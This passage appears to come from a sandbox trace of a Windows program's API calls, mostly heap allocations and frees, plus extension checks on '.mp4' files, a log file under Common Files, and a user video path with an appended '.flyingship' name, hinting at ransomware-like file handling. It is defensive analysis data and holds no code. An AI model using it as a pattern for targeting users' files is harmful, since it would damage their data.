dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0192.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0192.062] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.063] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.064] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0192.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.064] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0192.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.066] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.067] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0192.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x907778 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.070] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.070] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.070] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.070] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.070] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.071] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.071] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x332f, lpOverlapped=0x0) returned 1 [0192.071] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.071] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x332f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.071] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0192.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 